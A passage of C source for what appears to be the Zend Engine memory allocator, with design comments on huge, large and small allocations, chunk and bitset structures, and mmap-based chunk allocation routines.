/*
+----------------------------------------------------------------------+
| Zend Engine |
+----------------------------------------------------------------------+
| Copyright (c) 1998-2016 Zend Technologies Ltd. (http://www.zend.com) |
+----------------------------------------------------------------------+
| This source file is subject to version 2.00 of the Zend license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.zend.com/license/2_00.txt. |
| If you did not receive a copy of the Zend license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@zend.com so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
| Authors: Andi Gutmans <andi@zend.com> |
| Zeev Suraski <zeev@zend.com> |
| Dmitry Stogov <dmitry@zend.com> |
+----------------------------------------------------------------------+
*/
/* $Id$ */
/*
* zend_alloc is designed to be a modern CPU cache friendly memory manager
* for PHP. Most ideas are taken from jemalloc and tcmalloc implementations.
*
* All allocations are split into 3 categories:
*
* Huge - the size is greater than CHUNK size (~2M by default), allocation is
* performed using mmap(). The result is aligned on 2M boundary.
*
 * Large - a number of 4096-byte (4 KB) pages inside a CHUNK. Large blocks
 * are always aligned on a page boundary.
 *
 * Small - less than 3/4 of the page size. Small sizes are rounded up to the
 * nearest greater predefined small size (there are 30 predefined sizes:
 * 8, 16, 24, 32, ... 3072). Small blocks are allocated from
 * RUNs. Each RUN is allocated as one or a few consecutive pages.
 * Allocation inside RUNs is implemented using a linked list of free
 * elements. The result is aligned to 8 bytes.
*
 * zend_alloc allocates memory from the OS in CHUNKs; these CHUNKs and huge
 * memory blocks are always aligned to a CHUNK boundary, so it is very easy to
 * determine the CHUNK that owns a given pointer. Regular CHUNKs reserve a
 * single page at the start for bookkeeping. It contains a bitset of free
 * pages, a few bitsets for available runs of predefined small sizes, a map of
 * pages that keeps information about the usage of each page in this CHUNK, etc.
*
 * zend_alloc provides the familiar emalloc/efree/erealloc API, but in addition
 * it provides specialized and optimized routines to allocate blocks of
 * predefined sizes (e.g. emalloc_2(), emalloc_4(), ..., emalloc_large(), etc.).
 * The library uses C preprocessor tricks that substitute calls to emalloc()
 * with more specialized routines when the requested size is known.
*/
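/*
 * For illustration (assuming the default 2 MB chunk and 4 KB page, and
 * ignoring ZEND_DEBUG overhead), the three categories work out as follows:
 *
 *   emalloc(40)      - "small": rounded up to the 40-byte bin and served from
 *                      a RUN free list, 8-byte aligned;
 *   emalloc(10000)   - "large": rounded up to 3 pages (12288 bytes) inside a
 *                      CHUNK, page aligned;
 *   emalloc(3000000) - "huge": larger than a CHUNK, mmap()'ed separately and
 *                      aligned on a 2 MB boundary.
 */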
#include "zend.h"
#include "zend_alloc.h"
#include "zend_globals.h"
#include "zend_operators.h"
#include "zend_multiply.h"
#ifdef HAVE_SIGNAL_H
# include <signal.h>
#endif
#ifdef HAVE_UNISTD_H
# include <unistd.h>
#endif
#ifdef ZEND_WIN32
# include <wincrypt.h>
# include <process.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#if HAVE_LIMITS_H
#include <limits.h>
#endif
#include <fcntl.h>
#include <errno.h>
#ifndef _WIN32
# ifdef HAVE_MREMAP
# ifndef _GNU_SOURCE
# define _GNU_SOURCE
# endif
# ifndef __USE_GNU
# define __USE_GNU
# endif
# endif
# include <sys/mman.h>
# ifndef MAP_ANON
# ifdef MAP_ANONYMOUS
# define MAP_ANON MAP_ANONYMOUS
# endif
# endif
# ifndef MREMAP_MAYMOVE
# define MREMAP_MAYMOVE 0
# endif
# ifndef MAP_FAILED
# define MAP_FAILED ((void*)-1)
# endif
# ifndef MAP_POPULATE
# define MAP_POPULATE 0
# endif
# if defined(_SC_PAGESIZE) || (_SC_PAGE_SIZE)
# define REAL_PAGE_SIZE _real_page_size
static size_t _real_page_size = ZEND_MM_PAGE_SIZE;
# endif
#endif
#ifndef REAL_PAGE_SIZE
# define REAL_PAGE_SIZE ZEND_MM_PAGE_SIZE
#endif
#ifndef ZEND_MM_STAT
# define ZEND_MM_STAT 1 /* track current and peak memory usage */
#endif
#ifndef ZEND_MM_LIMIT
# define ZEND_MM_LIMIT 1 /* support for user-defined memory limit */
#endif
#ifndef ZEND_MM_CUSTOM
# define ZEND_MM_CUSTOM 1 /* support for custom memory allocator */
/* USE_ZEND_ALLOC=0 may switch to system malloc() */
#endif
#ifndef ZEND_MM_STORAGE
# define ZEND_MM_STORAGE 1 /* support for custom memory storage */
#endif
#ifndef ZEND_MM_ERROR
# define ZEND_MM_ERROR 1 /* report system errors */
#endif
#ifndef ZEND_MM_CHECK
# define ZEND_MM_CHECK(condition, message) do { \
if (UNEXPECTED(!(condition))) { \
zend_mm_panic(message); \
} \
} while (0)
#endif
typedef uint32_t zend_mm_page_info; /* 4-byte integer */
typedef zend_ulong zend_mm_bitset; /* 4-byte or 8-byte integer */
#define ZEND_MM_ALIGNED_OFFSET(size, alignment) \
(((size_t)(size)) & ((alignment) - 1))
#define ZEND_MM_ALIGNED_BASE(size, alignment) \
(((size_t)(size)) & ~((alignment) - 1))
#define ZEND_MM_SIZE_TO_NUM(size, alignment) \
(((size_t)(size) + ((alignment) - 1)) / (alignment))
#define ZEND_MM_BITSET_LEN (sizeof(zend_mm_bitset) * 8) /* 32 or 64 */
#define ZEND_MM_PAGE_MAP_LEN (ZEND_MM_PAGES / ZEND_MM_BITSET_LEN) /* 16 or 8 */
typedef zend_mm_bitset zend_mm_page_map[ZEND_MM_PAGE_MAP_LEN]; /* 64B */
#define ZEND_MM_IS_FRUN 0x00000000
#define ZEND_MM_IS_LRUN 0x40000000
#define ZEND_MM_IS_SRUN 0x80000000
#define ZEND_MM_LRUN_PAGES_MASK 0x000003ff
#define ZEND_MM_LRUN_PAGES_OFFSET 0
#define ZEND_MM_SRUN_BIN_NUM_MASK 0x0000001f
#define ZEND_MM_SRUN_BIN_NUM_OFFSET 0
#define ZEND_MM_SRUN_FREE_COUNTER_MASK 0x01ff0000
#define ZEND_MM_SRUN_FREE_COUNTER_OFFSET 16
#define ZEND_MM_NRUN_OFFSET_MASK 0x01ff0000
#define ZEND_MM_NRUN_OFFSET_OFFSET 16
#define ZEND_MM_LRUN_PAGES(info) (((info) & ZEND_MM_LRUN_PAGES_MASK) >> ZEND_MM_LRUN_PAGES_OFFSET)
#define ZEND_MM_SRUN_BIN_NUM(info) (((info) & ZEND_MM_SRUN_BIN_NUM_MASK) >> ZEND_MM_SRUN_BIN_NUM_OFFSET)
#define ZEND_MM_SRUN_FREE_COUNTER(info) (((info) & ZEND_MM_SRUN_FREE_COUNTER_MASK) >> ZEND_MM_SRUN_FREE_COUNTER_OFFSET)
#define ZEND_MM_NRUN_OFFSET(info) (((info) & ZEND_MM_NRUN_OFFSET_MASK) >> ZEND_MM_NRUN_OFFSET_OFFSET)
#define ZEND_MM_FRUN() ZEND_MM_IS_FRUN
#define ZEND_MM_LRUN(count) (ZEND_MM_IS_LRUN | ((count) << ZEND_MM_LRUN_PAGES_OFFSET))
#define ZEND_MM_SRUN(bin_num) (ZEND_MM_IS_SRUN | ((bin_num) << ZEND_MM_SRUN_BIN_NUM_OFFSET))
#define ZEND_MM_SRUN_EX(bin_num, count) (ZEND_MM_IS_SRUN | ((bin_num) << ZEND_MM_SRUN_BIN_NUM_OFFSET) | ((count) << ZEND_MM_SRUN_FREE_COUNTER_OFFSET))
#define ZEND_MM_NRUN(bin_num, offset) (ZEND_MM_IS_SRUN | ZEND_MM_IS_LRUN | ((bin_num) << ZEND_MM_SRUN_BIN_NUM_OFFSET) | ((offset) << ZEND_MM_NRUN_OFFSET_OFFSET))
#define ZEND_MM_BINS 30
typedef struct _zend_mm_page zend_mm_page;
typedef struct _zend_mm_bin zend_mm_bin;
typedef struct _zend_mm_free_slot zend_mm_free_slot;
typedef struct _zend_mm_chunk zend_mm_chunk;
typedef struct _zend_mm_huge_list zend_mm_huge_list;
#ifdef _WIN64
# define PTR_FMT "0x%0.16I64x"
#elif SIZEOF_LONG == 8
# define PTR_FMT "0x%0.16lx"
#else
# define PTR_FMT "0x%0.8lx"
#endif
#ifdef MAP_HUGETLB
int zend_mm_use_huge_pages = 0;
#endif
/*
 * Memory is retrieved from the OS in chunks of fixed size (2 MB).
 * Inside a chunk, memory is managed in pages of fixed size (4096 bytes),
 * so each chunk consists of 512 pages.
 * The first page of each chunk is reserved for the chunk header.
 * It contains service information about all pages.
*
* free_pages - current number of free pages in this chunk
*
* free_tail - number of continuous free pages at the end of chunk
*
 * free_map - bitset (a bit for each page). The bit is set if the corresponding
 * page is allocated. The allocator for "large sizes" may easily find
 * a free page (or a continuous run of pages) by searching for zero
 * bits.
*
* map - contains service information for each page. (32-bits for each
* page).
* usage:
* (2 bits)
* FRUN - free page,
* LRUN - first page of "large" allocation
* SRUN - first page of a bin used for "small" allocation
*
* lrun_pages:
* (10 bits) number of allocated pages
*
* srun_bin_num:
 * (5 bits) bin number (e.g. 0 for sizes 1-8, 1 for 9-16,
 * 2 for 17-24, 3 for 25-32, etc.); see zend_alloc_sizes.h
*/
struct _zend_mm_heap {
#if ZEND_MM_CUSTOM
int use_custom_heap;
#endif
#if ZEND_MM_STORAGE
zend_mm_storage *storage;
#endif
#if ZEND_MM_STAT
size_t size; /* current memory usage */
size_t peak; /* peak memory usage */
#endif
zend_mm_free_slot *free_slot[ZEND_MM_BINS]; /* free lists for small sizes */
#if ZEND_MM_STAT || ZEND_MM_LIMIT
size_t real_size; /* current size of allocated pages */
#endif
#if ZEND_MM_STAT
size_t real_peak; /* peak size of allocated pages */
#endif
#if ZEND_MM_LIMIT
size_t limit; /* memory limit */
int overflow; /* memory overflow flag */
#endif
zend_mm_huge_list *huge_list; /* list of huge allocated blocks */
zend_mm_chunk *main_chunk;
zend_mm_chunk *cached_chunks; /* list of unused chunks */
	int chunks_count; /* number of allocated chunks */
int peak_chunks_count; /* peak number of allocated chunks for current request */
int cached_chunks_count; /* number of cached chunks */
double avg_chunks_count; /* average number of chunks allocated per request */
#if ZEND_MM_CUSTOM
union {
struct {
void *(*_malloc)(size_t);
void (*_free)(void*);
void *(*_realloc)(void*, size_t);
} std;
struct {
void *(*_malloc)(size_t ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
void (*_free)(void* ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
void *(*_realloc)(void*, size_t ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
} debug;
} custom_heap;
#endif
};
struct _zend_mm_chunk {
zend_mm_heap *heap;
zend_mm_chunk *next;
zend_mm_chunk *prev;
int free_pages; /* number of free pages */
int free_tail; /* number of free pages at the end of chunk */
int num;
char reserve[64 - (sizeof(void*) * 3 + sizeof(int) * 3)];
zend_mm_heap heap_slot; /* used only in main chunk */
zend_mm_page_map free_map; /* 512 bits or 64 bytes */
zend_mm_page_info map[ZEND_MM_PAGES]; /* 2 KB = 512 * 4 */
};
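/*
 * A minimal sketch of how the structures above are used to identify an
 * allocation from a raw pointer (the real logic lives in zend_mm_free_heap()
 * and zend_mm_size() below); kept out of the build:
 */
#if 0
static void example_identify(zend_mm_heap *heap, void *ptr)
{
	/* chunks are ZEND_MM_CHUNK_SIZE aligned, huge blocks have offset 0 */
	size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);

	if (page_offset == 0) {
		/* huge allocation: tracked separately in heap->huge_list */
	} else {
		zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
		int page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
		zend_mm_page_info info = chunk->map[page_num];

		if (info & ZEND_MM_IS_SRUN) {
			int bin_num = ZEND_MM_SRUN_BIN_NUM(info);   /* "small" run */
			(void)bin_num;
		} else { /* ZEND_MM_IS_LRUN */
			int pages_count = ZEND_MM_LRUN_PAGES(info); /* "large" run */
			(void)pages_count;
		}
	}
	(void)heap;
}
#endif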
struct _zend_mm_page {
char bytes[ZEND_MM_PAGE_SIZE];
};
/*
* bin - is one or few continuous pages (up to 8) used for allocation of
* a particular "small size".
*/
struct _zend_mm_bin {
char bytes[ZEND_MM_PAGE_SIZE * 8];
};
struct _zend_mm_free_slot {
zend_mm_free_slot *next_free_slot;
};
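/*
 * Sketch (kept out of the build): free elements of a bin form a LIFO list
 * threaded through the free memory itself; this is what
 * zend_mm_alloc_small() and zend_mm_free_small() below do in O(1):
 */
#if 0
static void *example_pop_free_slot(zend_mm_heap *heap, int bin_num)
{
	zend_mm_free_slot *p = heap->free_slot[bin_num];

	if (p != NULL) {
		/* unlink the head element; the link is stored in the free memory */
		heap->free_slot[bin_num] = p->next_free_slot;
	}
	return (void*)p;
}
#endif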
struct _zend_mm_huge_list {
void *ptr;
size_t size;
zend_mm_huge_list *next;
#if ZEND_DEBUG
zend_mm_debug_info dbg;
#endif
};
#define ZEND_MM_PAGE_ADDR(chunk, page_num) \
((void*)(((zend_mm_page*)(chunk)) + (page_num)))
#define _BIN_DATA_SIZE(num, size, elements, pages, x, y) size,
static const unsigned int bin_data_size[] = {
ZEND_MM_BINS_INFO(_BIN_DATA_SIZE, x, y)
};
#define _BIN_DATA_ELEMENTS(num, size, elements, pages, x, y) elements,
static const int bin_elements[] = {
ZEND_MM_BINS_INFO(_BIN_DATA_ELEMENTS, x, y)
};
#define _BIN_DATA_PAGES(num, size, elements, pages, x, y) pages,
static const int bin_pages[] = {
ZEND_MM_BINS_INFO(_BIN_DATA_PAGES, x, y)
};
#if ZEND_DEBUG
ZEND_COLD void zend_debug_alloc_output(char *format, ...)
{
char output_buf[256];
va_list args;
va_start(args, format);
vsprintf(output_buf, format, args);
va_end(args);
#ifdef ZEND_WIN32
OutputDebugString(output_buf);
#else
fprintf(stderr, "%s", output_buf);
#endif
}
#endif
static ZEND_COLD ZEND_NORETURN void zend_mm_panic(const char *message)
{
fprintf(stderr, "%s\n", message);
/* See http://support.microsoft.com/kb/190351 */
#ifdef ZEND_WIN32
fflush(stderr);
#endif
#if ZEND_DEBUG && defined(HAVE_KILL) && defined(HAVE_GETPID)
kill(getpid(), SIGSEGV);
#endif
exit(1);
}
static ZEND_COLD ZEND_NORETURN void zend_mm_safe_error(zend_mm_heap *heap,
const char *format,
size_t limit,
#if ZEND_DEBUG
const char *filename,
uint lineno,
#endif
size_t size)
{
heap->overflow = 1;
zend_try {
zend_error_noreturn(E_ERROR,
format,
limit,
#if ZEND_DEBUG
filename,
lineno,
#endif
size);
} zend_catch {
} zend_end_try();
heap->overflow = 0;
zend_bailout();
exit(1);
}
#ifdef _WIN32
void
stderr_last_error(char *msg)
{
LPSTR buf = NULL;
DWORD err = GetLastError();
if (!FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
err,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPSTR)&buf,
0, NULL)) {
fprintf(stderr, "\n%s: [0x%08lx]\n", msg, err);
}
else {
fprintf(stderr, "\n%s: [0x%08lx] %s\n", msg, err, buf);
}
}
#endif
/*****************/
/* OS Allocation */
/*****************/
static void *zend_mm_mmap_fixed(void *addr, size_t size)
{
#ifdef _WIN32
return VirtualAlloc(addr, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
#else
/* MAP_FIXED leads to discarding of the old mapping, so it can't be used. */
void *ptr = mmap(addr, size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON /*| MAP_POPULATE | MAP_HUGETLB*/, -1, 0);
if (ptr == MAP_FAILED) {
#if ZEND_MM_ERROR
fprintf(stderr, "\nmmap() failed: [%d] %s\n", errno, strerror(errno));
#endif
return NULL;
} else if (ptr != addr) {
if (munmap(ptr, size) != 0) {
#if ZEND_MM_ERROR
fprintf(stderr, "\nmunmap() failed: [%d] %s\n", errno, strerror(errno));
#endif
}
return NULL;
}
return ptr;
#endif
}
static void *zend_mm_mmap(size_t size)
{
#ifdef _WIN32
void *ptr = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (ptr == NULL) {
#if ZEND_MM_ERROR
stderr_last_error("VirtualAlloc() failed");
#endif
return NULL;
}
return ptr;
#else
void *ptr;
#ifdef MAP_HUGETLB
if (zend_mm_use_huge_pages && size == ZEND_MM_CHUNK_SIZE) {
ptr = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON | MAP_HUGETLB, -1, 0);
if (ptr != MAP_FAILED) {
return ptr;
}
}
#endif
ptr = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
if (ptr == MAP_FAILED) {
#if ZEND_MM_ERROR
fprintf(stderr, "\nmmap() failed: [%d] %s\n", errno, strerror(errno));
#endif
return NULL;
}
return ptr;
#endif
}
static void zend_mm_munmap(void *addr, size_t size)
{
#ifdef _WIN32
if (VirtualFree(addr, 0, MEM_RELEASE) == 0) {
#if ZEND_MM_ERROR
stderr_last_error("VirtualFree() failed");
#endif
}
#else
if (munmap(addr, size) != 0) {
#if ZEND_MM_ERROR
fprintf(stderr, "\nmunmap() failed: [%d] %s\n", errno, strerror(errno));
#endif
}
#endif
}
/***********/
/* Bitmask */
/***********/
/* number of trailing set (1) bits (e.g. 0x03 -> 2; 0x04 -> 0; all-ones -> LEN) */
static zend_always_inline int zend_mm_bitset_nts(zend_mm_bitset bitset)
{
#if (defined(__GNUC__) || __has_builtin(__builtin_ctzl)) && SIZEOF_ZEND_LONG == SIZEOF_LONG && defined(PHP_HAVE_BUILTIN_CTZL)
return __builtin_ctzl(~bitset);
#elif (defined(__GNUC__) || __has_builtin(__builtin_ctzll)) && defined(PHP_HAVE_BUILTIN_CTZLL)
return __builtin_ctzll(~bitset);
#elif defined(_WIN32)
unsigned long index;
#if defined(_WIN64)
if (!BitScanForward64(&index, ~bitset)) {
#else
if (!BitScanForward(&index, ~bitset)) {
#endif
/* undefined behavior */
return 32;
}
return (int)index;
#else
int n;
if (bitset == (zend_mm_bitset)-1) return ZEND_MM_BITSET_LEN;
n = 0;
#if SIZEOF_ZEND_LONG == 8
if (sizeof(zend_mm_bitset) == 8) {
if ((bitset & 0xffffffff) == 0xffffffff) {n += 32; bitset = bitset >> Z_UL(32);}
}
#endif
if ((bitset & 0x0000ffff) == 0x0000ffff) {n += 16; bitset = bitset >> 16;}
if ((bitset & 0x000000ff) == 0x000000ff) {n += 8; bitset = bitset >> 8;}
if ((bitset & 0x0000000f) == 0x0000000f) {n += 4; bitset = bitset >> 4;}
if ((bitset & 0x00000003) == 0x00000003) {n += 2; bitset = bitset >> 2;}
return n + (bitset & 1);
#endif
}
/* number of trailing zero bits (0x01 -> 0; 0x40 -> 6; 0x00 -> LEN) */
static zend_always_inline int zend_mm_bitset_ntz(zend_mm_bitset bitset)
{
#if (defined(__GNUC__) || __has_builtin(__builtin_ctzl)) && SIZEOF_ZEND_LONG == SIZEOF_LONG && defined(PHP_HAVE_BUILTIN_CTZL)
return __builtin_ctzl(bitset);
#elif (defined(__GNUC__) || __has_builtin(__builtin_ctzll)) && defined(PHP_HAVE_BUILTIN_CTZLL)
return __builtin_ctzll(bitset);
#elif defined(_WIN32)
unsigned long index;
#if defined(_WIN64)
if (!BitScanForward64(&index, bitset)) {
#else
if (!BitScanForward(&index, bitset)) {
#endif
/* undefined behavior */
return 32;
}
return (int)index;
#else
int n;
if (bitset == (zend_mm_bitset)0) return ZEND_MM_BITSET_LEN;
n = 1;
#if SIZEOF_ZEND_LONG == 8
if (sizeof(zend_mm_bitset) == 8) {
if ((bitset & 0xffffffff) == 0) {n += 32; bitset = bitset >> Z_UL(32);}
}
#endif
if ((bitset & 0x0000ffff) == 0) {n += 16; bitset = bitset >> 16;}
if ((bitset & 0x000000ff) == 0) {n += 8; bitset = bitset >> 8;}
if ((bitset & 0x0000000f) == 0) {n += 4; bitset = bitset >> 4;}
if ((bitset & 0x00000003) == 0) {n += 2; bitset = bitset >> 2;}
return n - (bitset & 1);
#endif
}
static zend_always_inline int zend_mm_bitset_find_zero(zend_mm_bitset *bitset, int size)
{
int i = 0;
do {
zend_mm_bitset tmp = bitset[i];
if (tmp != (zend_mm_bitset)-1) {
return i * ZEND_MM_BITSET_LEN + zend_mm_bitset_nts(tmp);
}
i++;
} while (i < size);
return -1;
}
static zend_always_inline int zend_mm_bitset_find_one(zend_mm_bitset *bitset, int size)
{
int i = 0;
do {
zend_mm_bitset tmp = bitset[i];
if (tmp != 0) {
return i * ZEND_MM_BITSET_LEN + zend_mm_bitset_ntz(tmp);
}
i++;
} while (i < size);
return -1;
}
static zend_always_inline int zend_mm_bitset_find_zero_and_set(zend_mm_bitset *bitset, int size)
{
int i = 0;
do {
zend_mm_bitset tmp = bitset[i];
if (tmp != (zend_mm_bitset)-1) {
int n = zend_mm_bitset_nts(tmp);
bitset[i] |= Z_UL(1) << n;
return i * ZEND_MM_BITSET_LEN + n;
}
i++;
} while (i < size);
return -1;
}
static zend_always_inline int zend_mm_bitset_is_set(zend_mm_bitset *bitset, int bit)
{
return (bitset[bit / ZEND_MM_BITSET_LEN] & (Z_L(1) << (bit & (ZEND_MM_BITSET_LEN-1)))) != 0;
}
static zend_always_inline void zend_mm_bitset_set_bit(zend_mm_bitset *bitset, int bit)
{
bitset[bit / ZEND_MM_BITSET_LEN] |= (Z_L(1) << (bit & (ZEND_MM_BITSET_LEN-1)));
}
static zend_always_inline void zend_mm_bitset_reset_bit(zend_mm_bitset *bitset, int bit)
{
bitset[bit / ZEND_MM_BITSET_LEN] &= ~(Z_L(1) << (bit & (ZEND_MM_BITSET_LEN-1)));
}
static zend_always_inline void zend_mm_bitset_set_range(zend_mm_bitset *bitset, int start, int len)
{
if (len == 1) {
zend_mm_bitset_set_bit(bitset, start);
} else {
int pos = start / ZEND_MM_BITSET_LEN;
int end = (start + len - 1) / ZEND_MM_BITSET_LEN;
int bit = start & (ZEND_MM_BITSET_LEN - 1);
zend_mm_bitset tmp;
if (pos != end) {
/* set bits from "bit" to ZEND_MM_BITSET_LEN-1 */
tmp = (zend_mm_bitset)-1 << bit;
bitset[pos++] |= tmp;
while (pos != end) {
/* set all bits */
bitset[pos++] = (zend_mm_bitset)-1;
}
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* set bits from "0" to "end" */
tmp = (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
bitset[pos] |= tmp;
} else {
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* set bits from "bit" to "end" */
tmp = (zend_mm_bitset)-1 << bit;
tmp &= (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
bitset[pos] |= tmp;
}
}
}
static zend_always_inline void zend_mm_bitset_reset_range(zend_mm_bitset *bitset, int start, int len)
{
if (len == 1) {
zend_mm_bitset_reset_bit(bitset, start);
} else {
int pos = start / ZEND_MM_BITSET_LEN;
int end = (start + len - 1) / ZEND_MM_BITSET_LEN;
int bit = start & (ZEND_MM_BITSET_LEN - 1);
zend_mm_bitset tmp;
if (pos != end) {
/* reset bits from "bit" to ZEND_MM_BITSET_LEN-1 */
tmp = ~((Z_L(1) << bit) - 1);
bitset[pos++] &= ~tmp;
while (pos != end) {
				/* reset all bits */
bitset[pos++] = 0;
}
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* reset bits from "0" to "end" */
tmp = (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
bitset[pos] &= ~tmp;
} else {
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* reset bits from "bit" to "end" */
tmp = (zend_mm_bitset)-1 << bit;
tmp &= (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
bitset[pos] &= ~tmp;
}
}
}
static zend_always_inline int zend_mm_bitset_is_free_range(zend_mm_bitset *bitset, int start, int len)
{
if (len == 1) {
return !zend_mm_bitset_is_set(bitset, start);
} else {
int pos = start / ZEND_MM_BITSET_LEN;
int end = (start + len - 1) / ZEND_MM_BITSET_LEN;
int bit = start & (ZEND_MM_BITSET_LEN - 1);
zend_mm_bitset tmp;
if (pos != end) {
/* set bits from "bit" to ZEND_MM_BITSET_LEN-1 */
tmp = (zend_mm_bitset)-1 << bit;
if ((bitset[pos++] & tmp) != 0) {
return 0;
}
while (pos != end) {
				/* check that all bits are zero */
if (bitset[pos++] != 0) {
return 0;
}
}
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* set bits from "0" to "end" */
tmp = (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
return (bitset[pos] & tmp) == 0;
} else {
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* set bits from "bit" to "end" */
tmp = (zend_mm_bitset)-1 << bit;
tmp &= (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
return (bitset[pos] & tmp) == 0;
}
}
}
/**********/
/* Chunks */
/**********/
static void *zend_mm_chunk_alloc_int(size_t size, size_t alignment)
{
void *ptr = zend_mm_mmap(size);
if (ptr == NULL) {
return NULL;
} else if (ZEND_MM_ALIGNED_OFFSET(ptr, alignment) == 0) {
#ifdef MADV_HUGEPAGE
madvise(ptr, size, MADV_HUGEPAGE);
#endif
return ptr;
} else {
size_t offset;
		/* the mapping is not chunk-aligned: over-allocate by (alignment - page size)
		 * and unmap the unaligned head and tail so the result lands on a chunk boundary */
zend_mm_munmap(ptr, size);
ptr = zend_mm_mmap(size + alignment - REAL_PAGE_SIZE);
#ifdef _WIN32
offset = ZEND_MM_ALIGNED_OFFSET(ptr, alignment);
zend_mm_munmap(ptr, size + alignment - REAL_PAGE_SIZE);
ptr = zend_mm_mmap_fixed((void*)((char*)ptr + (alignment - offset)), size);
offset = ZEND_MM_ALIGNED_OFFSET(ptr, alignment);
if (offset != 0) {
zend_mm_munmap(ptr, size);
return NULL;
}
return ptr;
#else
offset = ZEND_MM_ALIGNED_OFFSET(ptr, alignment);
if (offset != 0) {
offset = alignment - offset;
zend_mm_munmap(ptr, offset);
ptr = (char*)ptr + offset;
alignment -= offset;
}
if (alignment > REAL_PAGE_SIZE) {
zend_mm_munmap((char*)ptr + size, alignment - REAL_PAGE_SIZE);
}
# ifdef MADV_HUGEPAGE
madvise(ptr, size, MADV_HUGEPAGE);
# endif
#endif
return ptr;
}
}
static void *zend_mm_chunk_alloc(zend_mm_heap *heap, size_t size, size_t alignment)
{
#if ZEND_MM_STORAGE
if (UNEXPECTED(heap->storage)) {
void *ptr = heap->storage->handlers.chunk_alloc(heap->storage, size, alignment);
		ZEND_ASSERT(((zend_uintptr_t)((char*)ptr + (alignment-1)) & ~(alignment-1)) == (zend_uintptr_t)ptr);
return ptr;
}
#endif
return zend_mm_chunk_alloc_int(size, alignment);
}
static void zend_mm_chunk_free(zend_mm_heap *heap, void *addr, size_t size)
{
#if ZEND_MM_STORAGE
if (UNEXPECTED(heap->storage)) {
heap->storage->handlers.chunk_free(heap->storage, addr, size);
return;
}
#endif
zend_mm_munmap(addr, size);
}
static int zend_mm_chunk_truncate(zend_mm_heap *heap, void *addr, size_t old_size, size_t new_size)
{
#if ZEND_MM_STORAGE
if (UNEXPECTED(heap->storage)) {
if (heap->storage->handlers.chunk_truncate) {
return heap->storage->handlers.chunk_truncate(heap->storage, addr, old_size, new_size);
} else {
return 0;
}
}
#endif
#ifndef _WIN32
zend_mm_munmap((char*)addr + new_size, old_size - new_size);
return 1;
#else
return 0;
#endif
}
static int zend_mm_chunk_extend(zend_mm_heap *heap, void *addr, size_t old_size, size_t new_size)
{
#if ZEND_MM_STORAGE
if (UNEXPECTED(heap->storage)) {
if (heap->storage->handlers.chunk_extend) {
return heap->storage->handlers.chunk_extend(heap->storage, addr, old_size, new_size);
} else {
return 0;
}
}
#endif
#ifndef _WIN32
return (zend_mm_mmap_fixed((char*)addr + old_size, new_size - old_size) != NULL);
#else
return 0;
#endif
}
static zend_always_inline void zend_mm_chunk_init(zend_mm_heap *heap, zend_mm_chunk *chunk)
{
chunk->heap = heap;
chunk->next = heap->main_chunk;
chunk->prev = heap->main_chunk->prev;
chunk->prev->next = chunk;
chunk->next->prev = chunk;
	/* account for the page(s) reserved for the chunk header */
chunk->free_pages = ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE;
chunk->free_tail = ZEND_MM_FIRST_PAGE;
	/* younger chunks get bigger numbers */
chunk->num = chunk->prev->num + 1;
/* mark first pages as allocated */
chunk->free_map[0] = (1L << ZEND_MM_FIRST_PAGE) - 1;
chunk->map[0] = ZEND_MM_LRUN(ZEND_MM_FIRST_PAGE);
}
/***********************/
/* Huge Runs (forward) */
/***********************/
static size_t zend_mm_get_huge_block_size(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
static void *zend_mm_alloc_huge(zend_mm_heap *heap, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
static void zend_mm_free_huge(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
#if ZEND_DEBUG
static void zend_mm_change_huge_block_size(zend_mm_heap *heap, void *ptr, size_t size, size_t dbg_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
#else
static void zend_mm_change_huge_block_size(zend_mm_heap *heap, void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
#endif
/**************/
/* Large Runs */
/**************/
#if ZEND_DEBUG
